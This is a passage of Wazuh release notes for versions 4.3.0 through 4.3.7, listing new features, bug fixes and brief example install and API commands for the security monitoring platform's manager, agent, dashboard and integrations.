  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.7.

Packages
  • #1737 passwords-tool tests are added with the files passwords-tool.yml and tests-stack.sh.

  • #1742 A port status check is added to the Wazuh installation assistant to avoid the installation ending up in failure if one of the Wazuh default ports is being used.

  • #1754 Skipping the OS check of the wazuh-install.sh script when downloading files is added.

  • #1629 The -tmp option is added to the wazuh-certs-tool script to specify the tmp directory.

  • #1685 The RHEL 9 SCA files are added to the specs.

  • #1734 All Zypper references are removed from the unattended and test directories.

  • #1753 TLS versions lower than v1.2 are disabled to avoid using weak cipher suites.

  • #1641 Removed the revision variables from the Wazuh installation assistant.

  • #1750 The OVA generation scripts are modified to adapt them to the newest changes in wazuh-passwords-tool.sh.

  • #1769 The path when copying Fedora SCA files is fixed with the new versions.

RPM revision 2
  • v4.3.7-2 A bug related to the installation of the SCA policy in RHEL8 is fixed. This error caused the RHEL 9 SCA policy to be installed in RHEL 8 machines instead of the correct one.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#13956

A bug in Analysisd that may make it crash when decoding regexes with more than 14 subpatterns is fixed.

#14366

The risk of a crash when Vulnerability Detector parses OVAL feeds is fixed.

#14436

A busy-looping in wazuh-maild when monitoring alerts.json is fixed.

#14417

A segmentation fault in wazuh-maild when parsing alerts exceeding the nesting limit is fixed.

Wazuh agent

Reference

Description

#14368

A code defect in the GitHub integration module reported by Coverity is fixed.

#14518

An undefined behavior in the agent unit tests is fixed.

Ruleset

Reference

Description

#14513

A bug found in the regular expression used for check 5.1.1 (ID 19137) of the Ubuntu 20 SCA policy file that caused false positives is fixed.

#14483

An error when a Wazuh agent runs an AWS Amazon Linux SCA policy is fixed.

#13950

Amazon Linux 2 SCA policy is modified to resolve rules and conditions on control 1.5.2.

#14481

Missing SCA files are added to the Wazuh manager installation.

#14678

OS detection in Ubuntu 20.04 LTS SCA policy is now fixed.

Wazuh dashboard

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

Module settings not persisting between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

The persistence of the plugin registry file between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

Module settings not persisting between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Splunk app

Reference

Description

#1359

The API console suggestions were not working in version 4.3.6 and are now fixed.

Packages

Reference

Description

#1762

The Wazuh GPG key is now removed when uninstalling all the Wazuh components using the installation assistant.

#1765

Handling of errors that might happen when downloading Filebeat files is added.

#1766

A check of the indentation of the config.yml file is added.

#1731

An error when installing every component of a distributed installation in the same host using the 127.0.0.1 IP address is fixed.

#1619

The code of the Wazuh installation assistant has been improved.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.6 Release notes - 20 July 2022

This section lists the changes in version 4.3.6. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements, such as the following:

Wazuh manager
  • #14085 Support for Ubuntu 22 (Jammy) is added in Vulnerability Detector.

  • #14117 Support for Red Hat 9 is added in Vulnerability Detector.

  • #14111 The shared configuration file handling performance is improved in wazuh-remoted.

Wazuh agent
  • #13837 The macOS codename list is updated in Syscollector.

  • #14093 The GitHub and Office365 integrations log messages are improved.

Ruleset
  • #13893 Ubuntu Linux 22.04 SCA policy is added.

  • #13905 Apple macOS 12.0 Monterey SCA policy is added.

Wazuh Splunk app
  • #1351 The documentation links are updated to match their respective title on the Wazuh documentation page.

  • #1354 The use of all tags to filter Wazuh Server logs is re-allowed.

Packages
  • #1706 The text of the password tool help option is improved.

  • #1696 The passwords.wazuh file is renamed to wazuh-passwords.txt.

  • #1697 Wazuh dashboard users wazuh_admin and wazuh_user and roles wazuh_ui_user and wazuh_ui_admin are removed from the installation templates.

  • #1718 The periodic Filebeat metrics are disabled.

  • #1683 New Darwin 21 SCA file for macOS 12 added.

  • #1684 New Ubuntu 22 SCA file added.

Other
  • #14121 The Filebeat logging metrics are disabled.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#14098

The potential memory leaks in Vulnerability Detector when parsing OVAL with no criteria are fixed.

#13957

A bug in Vulnerability Detector that skipped Windows 8.1 and Windows 8 agents is fixed.

#14061

A bug in wazuh-db that stored duplicate Syscollector package data is fixed.

Wazuh agent

Reference

Description

#13941

The agent shutdown when syncing Syscollector data is fixed.

#14207

A bug in the agent installer that incorrectly detected the Wazuh username is fixed.

#14100

The macOS vendor data retrieval in Syscollector is fixed.

#14106

A bug in the Syscollector data sync when the agent gets disconnected is fixed.

#13980

A crash in the Windows agent caused by the Syscollector SMBIOS parser for Windows agents is fixed.

RESTful API

Reference

Description

#14152

The API now correctly returns an exception when the user asks for agent inventory information and there is no database for it, such as for never_connected agents.

Wazuh dashboard

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link in the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link in the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link to the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Splunk app

Reference

Description

#1351

Some links to web documentation that didn't work are fixed.

#1296

An error in the DevTools where the payload was not being sent, causing the request to fail, is fixed.

Packages

Reference

Description

#1713

An error when upgrading using symlinks is fixed.

#1721

An error with the installation assistant API in single Wazuh manager nodes is fixed.

#1726

A problem with Filebeat found in systems using GLIBC is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.5 Release notes - 29 June 2022

This section lists the changes in version 4.3.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements, such as the following:

Wazuh manager
  • #13915 The Vulnerability Detector log is improved for the case when the agent OS data is unavailable.

Wazuh agent
  • #13749 Package data support is extended in Syscollector for modern RPM agents.

  • #13898 Verbosity of the GitHub module logs is improved.

Ruleset
  • #13567 Deprecated MITRE tags in rules are removed.

Wazuh dashboard
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Splunk app
  • #1292 The Pending status is added to the Agents sections.

  • #1276 A disabled state is added to the Apply changes button on the Agents group editor when no changes to the group are made.

Packages
  • #1635 Removed dependencies from the wazuh-indexer package.

  • #1663 Improved how the password tool changes the API passwords.

Other
  • #13811 The test_agent_PUT_endpoints.tavern.yaml API integration test failure in numbered branches is fixed.

  • #13790 The external click and clickclick Python dependencies are upgraded to 8.1.3 and 20.10.2 respectively.

Resolved issues

This release resolves the following known issues:

Wazuh manager

Reference

Description

#13662

The upgrade module response message has been fixed not to include null values.

#13863

A string truncation warning log in wazuh-authd when enabling password authentication is fixed.

#13587

A memory leak in wazuh-analysisd when overwriting a rule multiple times is fixed.

#13907

The wazuh-agentd and client-auth are prevented from performing enrollment if the agent fails to validate the manager certificate.

#13694

The manager compilation when enabling GeoIP support is fixed.

#13883

A crash in wazuh-modulesd when getting stopped while downloading a Vulnerability Detector feed is fixed.

Wazuh agent

Reference

Description

#13606

Agent auto-restart on shared configuration changes when running on containerized environments is fixed.

#13880

An issue when attempting to run the DockerListener integration using Python 3.6 and having the Docker service stopped is fixed.

RESTful API

Reference

Description

#13867

The tag parameter of GET /manager/logs and GET /cluster/{node_id}/logs endpoints is updated to accept any string.

Ruleset

Reference

Description

#13597

Fixed Eventchannel testing and improved reporting capabilities of the runtest tool.

#13781

The Amazon Linux 2 SCA policy is modified to resolve a typo on control 1.1.22 and EMPTY_LINE conditions.

#13950

The Amazon Linux 2 SCA policy is modified to resolve the rule and condition on control 1.5.2.

Wazuh dashboard

Reference

Description

#4233

A type error when changing the screen size in the Agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail because the index already existed, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to the API not being available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration in manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4233

A type error when changing the screen size in the Agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail because the index already existed, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to the API not being available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration in manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4233

A type error when changing the screen size in the Agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail because the index already existed, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to the API not being available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration in manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Splunk app

Reference

Description

#1290

Outdated documentation links have been updated.

#1343

The Alerts view from the MITRE section has been hardened in case of errors during the requests to the API (for example timeouts).

Packages

Reference

Description

#1673

The error with the installation of the file init.d to enable Wazuh service in RHEL 9 systems is fixed.

#1675

The error with the installation of the file sysv-init to enable Wazuh service in RHEL 9 systems is fixed.

Changelogs

More details about these changes are provided in the changelog of each component.

4.3.4 Release notes - 8 June 2022

This section lists the changes in version 4.3.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh manager
  • #13437 Integratord now tries to read alerts indefinitely, instead of performing 3 attempts.

  • #13626 A timeout for remote queries made by the Office 365, GitHub, and Agent Update modules is added.

Wazuh dashboard
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 #4199 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 #4199 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Splunk app
  • #1327 Splunk search-handler event management is improved to avoid forwarder toast error misinterpretation.

Packages
  • #1595 Splunk packages builder is simplified.

  • #1606 The Wazuh logo on the login page is updated.

  • #1628 Support for Ubuntu 22 is added.

  • #1548 The installation assistant now changes the Wazuh API default passwords.

Resolved issues

This release resolves known issues.

Wazuh manager

Reference

Description

#13621

A bug in agent_groups CLI when removing agent groups is fixed.

#13459

Linux compilation errors with GCC 12 are fixed.

#13604

A crash in wazuh-analysisd when overwriting a rule with a configured active response is fixed.

#13666

A crash in wazuh-db when it cannot open a database file is fixed.

#13566

The vulnerability feed parsing mechanism now truncates excessively long values (This problem was detected during Ubuntu Bionic feed update).

#13679

A crash in wazuh-maild when parsing an alert with no full log and containing arrays of non-strings is fixed.

RESTful API

Reference

Description

#13550

The default timeouts for GET /mitre/software and GET /mitre/techniques are updated to avoid timing out in slow environments.

Ruleset

Reference

Description

#13560

The prematch criteria of sshd-disconnect decoder is fixed.

Wazuh dashboard

Reference

Description

#4166

An issue where the platform visualizations didn't use some UI-related definitions on Kibana 7.10.2 is now fixed.

#4167

An issue where a success toast message appeared when removing an agent from a group in Management/Groups, but the agent still appeared in the agent list after refreshing the table, is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4166

An issue where the platform visualizations didn't use some UI-related definitions on Kibana 7.10.2 is now fixed.

#4167

An issue where a success toast message appeared when removing an agent from a group in Management/Groups, but the agent still appeared in the agent list after refreshing the table, is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4166

An issue where the platform visualizations didn't use some UI-related definitions on Kibana 7.10.2 is now fixed.

#4167

An issue where a success toast message appeared when removing an agent from a group in Management/Groups, but the agent still appeared in the agent list after refreshing the table, is fixed.

#4176

The import of an empty rule or decoder file is fixed.

#4180

The overwriting of rule and decoder imports is now fixed.

#4157

Wazuh now maintains the filters when clicking on the Visualize button of a document field from <Module>/Events and redirects to the lens plugin.

#4198

Missing background in the status graph tooltip in agents is fixed.

#4219

The problem that allowed removing the filters from the module is fixed.

Wazuh Splunk app

Reference

Description

#1329

Unhandled expired session when requesting Splunk DB documents is fixed.

Packages

Reference

Description

#1613

The SUSE init script installation in the agent is fixed.

Changelogs

More details about these changes are provided in the changelog of each component.

4.3.3 Release notes - 1 June 2022

This section lists the changes in version 4.3.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.3.3.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13651

Avoid creating duplicated <client> configuration blocks during deployment.

Agent

Reference

Description

#13642

Prevent Agentd from resetting its configuration on <client> block re-definition.

Wazuh dashboard

Reference

Description

#4151

The Wazuh dashboard troubleshooting URL is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4150

The Wazuh Kibana plugin troubleshooting URL is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4146

A bug that prevented removing implicit filters in modules is now fixed.

#4150

The Wazuh Kibana plugin troubleshooting URL is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component.

4.3.2 Release notes - 30 May 2022

This section lists the changes in version 4.3.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new
Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.2.

Resolved issues

This release resolves a known issue.

Manager

Reference

Description

#13617

A crash in Vulnerability Detector when scanning agents running on Windows is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component.

4.3.1 Release notes - 18 May 2022

This section lists the changes in version 4.3.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh dashboard
  • #4142 Added a warning about the PowerShell version requirement in the Windows agent installation wizard.

Wazuh Splunk app
  • #1322 Added a warning about the PowerShell version requirement in the Windows agent installation wizard.

  • #1323 The compatibility checks of the app have been changed to simplify the release flow.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13439

A crash when overwritten rules are triggered is fixed.

#13439

A memory leak when loading overwritten rules is fixed.

#13439

The use of relationship labels in overwritten rules is now fixed.

#13430

The regex used to transform into datetime in the logtest framework function is fixed.

RESTful API

Reference

Description

#13178

The API response when using sort in Agent upgrade related endpoints is now fixed.

Ruleset

Reference

Description

#13409

Fixed rule 92656, added field condition win.eventdata.logonType equals 10 to avoid false positives.

Wazuh dashboard

Reference

Description

#4141

Enhanced the output of the Ruleset Test tool. An error that caused falsy values to be displayed as undefined is now fixed.

Wazuh Splunk app

Reference

Description

#1320

Fixed the render condition of a toast message related to the forwarder when there is no agent data and the agent deployment guide is displayed in the Agents section.

#1318

Access to Management/Configuration, which failed due to missing permissions when the manager cluster is disabled, is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component.

4.3.0 Release notes - 5 May 2022

This section lists the changes in version 4.3.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Wazuh 4.3.0 includes many new additions, most notably the new Wazuh indexer and Wazuh dashboard components, which improve the user experience and facilitate the management of the whole platform.

Version 4.3.0 enhances the performance of the Wazuh solution and adds new integrations such as the following:

  • Vulnerability Detector support for Amazon Linux and Arch Linux

  • New agent integrations with logs from Office 365 and GitHub

  • Improved RESTful API availability thanks to the API now using multiple processes

  • Now the Wazuh manager cluster uses multiple processes for improved performance

  • Wazuh now supports Logcollector with native macOS logs (Unified Logging System)

  • AWS S3 Server Access logs, Google Cloud Storage buckets, and access logs are now supported too

Below you will find more information about each of these new features.

With Wazuh 4.3.0, two new installers, the Wazuh indexer and the Wazuh dashboard, are available to users to facilitate installation, upgrades, and configuration. The Wazuh indexer is a customized OpenSearch distribution with the configurations and tools needed to run out of the box for Wazuh. The Wazuh dashboard is a customized OpenSearch Dashboards distribution with the Wazuh plugin embedded, plus new configurations and customizations.

The new Wazuh dashboard is a flexible and intuitive web interface for mining, analyzing, and visualizing data. It provides out-of-the-box dashboards, allowing users to navigate an interface that now presents a renewed design with a new color palette. Its versioning, aligned with that of the Wazuh manager, allows upgrades without the risk of incompatibilities.

An installation assistant, wazuh-install.sh, is available to users, allowing any type of installation, whether all-in-one, single-node, or multi-node. This is possible by simply defining a configuration file, with everything connected and secured, including random passwords and generated certificates. In addition, Debian and RPM packages for ppc64le architectures are made available to users.
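
To illustrate, below is a minimal sketch of how the assistant is typically run; the download URL and the -a flag are indicative of the 4.3 quickstart and should be verified against the Installation guide for your environment.

    # Download the installation assistant (URL indicative of the 4.3 packages site).
    curl -sO https://packages.wazuh.com/4.3/wazuh-install.sh

    # All-in-one installation: Wazuh indexer, server, and dashboard on one host,
    # with certificates and random passwords generated automatically.
    sudo bash ./wazuh-install.sh -a

    # For distributed deployments, a config.yml describing the nodes is defined
    # first, and the assistant is then run once per component on each host.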

Now, the agent is able to collect the installed packages inventory on Amazon Linux and Arch Linux, giving support to Vulnerability Detector for reporting vulnerability exposures. In addition, Vulnerability Detector now manages a vulnerability inventory and produces alerts during the first agent scan and when a new vulnerability is either found or solved.

vulnerability detection inventory
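
As a hedged example, the inventory can be queried through the Wazuh API endpoints referenced later in these notes, GET /vulnerability/{agent_id} and GET /vulnerability/{agent_id}/last_scan; the host, port, agent ID, and filter values below are placeholders, and $TOKEN holds a JWT obtained from the API authentication endpoint.

    # List vulnerabilities reported for agent 001, filtering by severity.
    curl -k -H "Authorization: Bearer $TOKEN" \
         "https://localhost:55000/vulnerability/001?severity=Critical&pretty=true"

    # Check when the last full and partial vulnerability scans ran for that agent.
    curl -k -H "Authorization: Bearer $TOKEN" \
         "https://localhost:55000/vulnerability/001/last_scan?pretty=true"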

New integrations to collect auditing logs from Office 365 and GitHub are added to the agent in this new version. A side panel component that displays information about the active module of the Office 365 setup is introduced, and the Wazuh dashboard now includes events from Office 365. Moreover, Wazuh now supports Logcollector with native macOS logs (Unified Logging System), AWS S3 Server Access logs, and Google Cloud Storage buckets and access logs.
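
For reference, a minimal sketch of what a GitHub audit log collection block in ossec.conf might look like is shown below; the tag and option names are assumptions and should be checked against the GitHub module reference for this release.

    <!-- Illustrative only: option names should be verified in the module reference. -->
    <github>
      <enabled>yes</enabled>
      <interval>10m</interval>
      <api_auth>
        <org_name>your-organization</org_name>
        <api_token>YOUR_PERSONAL_ACCESS_TOKEN</api_token>
      </api_auth>
    </github>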

The RESTful API availability has been enhanced thanks to the API now using multiple processes. The performance of several API endpoints is also improved, which is especially noticeable in large environments. Additionally, the agent upgrade endpoints accept an increased limit of agents per request and a new set of filters.
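
As a hedged illustration of working with the API, the typical flow is to request a JWT and then call the endpoints with it; the credentials, host, and query parameters below are placeholders, and the exact authentication call should be checked against the API reference.

    # Request a JWT from the Wazuh API (default port 55000; credentials are placeholders).
    TOKEN=$(curl -s -k -u wazuh:MY_PASSWORD -X POST \
            "https://localhost:55000/security/user/authenticate?raw=true")

    # List active agents, limiting the response size.
    curl -k -H "Authorization: Bearer $TOKEN" \
         "https://localhost:55000/agents?status=active&limit=5&pretty=true"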

Wazuh v4.3.0 brings significant changes to the cluster, which now uses multiple processes to improve performance. The results show a significant improvement for the cluster in this new version: cluster tasks are performed 423% faster than in the previous version, approximately five times faster, while RAM consumption decreased to a third. This improvement is especially appreciable during the setup phase, where the cluster load is at its highest.

Another significant new feature in Wazuh 4.3.0 is the new Intelligence tab added to the MITRE ATT&CK module. This tab provides further information about MITRE resources such as groups, mitigations, tactics, and techniques using the new Wazuh API endpoints. Additionally, the Framework tab is adapted to the new Wazuh API endpoints.
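
As an illustrative sketch, the new MITRE resources can also be queried directly through the API endpoints mentioned in these notes, for example GET /mitre/techniques and GET /mitre/software; the parameters below are placeholders.

    # Retrieve a few MITRE ATT&CK techniques through the Wazuh API.
    curl -k -H "Authorization: Bearer $TOKEN" \
         "https://localhost:55000/mitre/techniques?limit=5&pretty=true"

    # Other MITRE resources, such as software, are exposed by sibling endpoints.
    curl -k -H "Authorization: Bearer $TOKEN" \
         "https://localhost:55000/mitre/software?limit=5&pretty=true"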

Finally, it is important to remark that support for all installation alternatives is maintained and extended by adding more recent versions.

What's new

This release includes new features or enhancements.

Manager
  • #8178 Wazuh adds support for Arch Linux OS in Vulnerability Detector.

  • #8749 A log message in the cluster.log file is added to notify that wazuh-clusterd has been stopped.

  • #9077 Wazuh improves the API and cluster processes behavior by reporting the PID of the wazuh-clusterd and API processes when they are started in foreground mode.

  • #10492 Time calculation is added when extra information is requested from the cluster_control binary.

  • #9209 Wazuh adds a context variable to indicate the origin module in socket communication messages.

  • #9733 Unit tests for framework/core files are added to increase coverage.

  • #9204 A verbose mode is added in the wazuh-logtest tool.

  • #8830 Wazuh adds Vulnerability Detector support for Amazon Linux.

  • #10693 The new <force> option is introduced to set the behavior when Authd finds conflicts on agent enrollment requests.

  • #9099 Wazuh adds sanitizers to the unit tests execution.

  • #8237 Vulnerability Detector introduces vulnerability inventory.

  • The manager will only deliver alerts when new vulnerabilities are detected in agents or when they stop applying.

  • #11031 A mechanism to ensure the worker synchronization permissions are reset after a fixed period of time is added.

  • #11799 A new mechanism is now added to create and handle PID files for each child process of the API and cluster.

  • #8083 The internal handling of agent keys is changed in Remoted to speed up key reloading.

  • #7885 The option <server> of the Syslog output now supports hostname resolution.

  • #7763 The product's UNIX user and group are renamed to "wazuh".

  • #7865 The MITRE database is redesigned to provide full and searchable data.

  • #7358 The static fields related to FIM are ported to dynamic fields in Analysisd.

  • #8351 All randomly generated IDs used for cluster tasks are changed. Now, uuid4 is used to ensure IDs are not repeated.

  • #8873 The sendsync error log is improved to provide more details about the parameters used.

  • #9708 The walk_dir function is changed to be iterative instead of recursive.

  • #10183 The Integrity sync behavior is refactored so that new synchronizations do not start until extra-valid files are processed.

  • #10101 Cluster synchronization is changed so that the content of the etc/shared folder is synchronized.

  • #8351 All XML file loads are changed. Now, defusedxml library is used to avoid possible XML-based attacks.

  • #8535 Configuration validation from execq socket is changed to com socket.

  • #8392 The utils unittest is updated to improve process_array function coverage.

  • #8885 The request_slice calculation is changed to improve efficiency when accessing wazuh-db data.

  • #9273 The retrieval of information from wazuh-db is improved to reach the optimum size in a single iteration.

  • #9234 The way the framework uses context cached functions is optimized, and a note is added to the context_cached docstring.

  • #9332 The framework regexes are improved to be more specific and less vulnerable.

  • #9423 The framework exceptions are unified for non-active agents.

  • #9433 The RBAC policies are changed to be case insensitive.

  • #9548 Framework stats module is refactored into SDK and core components to comply with Wazuh framework code standards.

  • #10309 The size of the agents' chunks sent to the upgrade socket is changed to make the upgrade endpoints faster.

  • #9408 The rootcheck and syscheck SDK code is refactored to make it clearer.

  • #9738 The Azure-logs module is adapted to use Microsoft Graph API instead of Active Directory Graph API.

  • #8060 Analysisd now reconnects to Active Response if Remoted or Execd gets restarted.

  • #10335 Agent key polling now supports cluster environments.

  • #10357 The support of Vulnerability Detector is extended for Debian 11 (Bullseye).

  • #10326 The Remoted performance is improved with an agent TCP connection sending queue.

  • #9093 Agent DB synchronization has been boosted by caching the last data checksum in Wazuh DB.

  • #8892 Logtest now scans new ruleset files when loading a new session.

  • #8237 CVE alerts by Vulnerability Detector now include the time of detection, severity, and score.

  • #10849 The manager startup is fixed when <database_output> is enabled.

  • Improved cluster performance using multiprocessing:
    • #10767 The cluster local_integrity task is changed to run in a separate process to improve overall performance.

    • #10807 Now, the cluster communication with the database for agent information synchronization runs in a separate parallel process.

    • #10920 Now, the cluster processing of the extra-valid files in the master node is carried out in a separate parallel process.

    • #11328 The cluster's file compression task in the master node is carried out in a separate parallel process.

    • #11364 Now, the processing of Integrity files in worker nodes is carried out in a separate parallel process.

    • #11386 The cluster and API fall back to single processing when the wazuh user doesn't have permissions to access /dev/shm.

  • #12446 Support for Windows 11 is added in Vulnerability Detector.

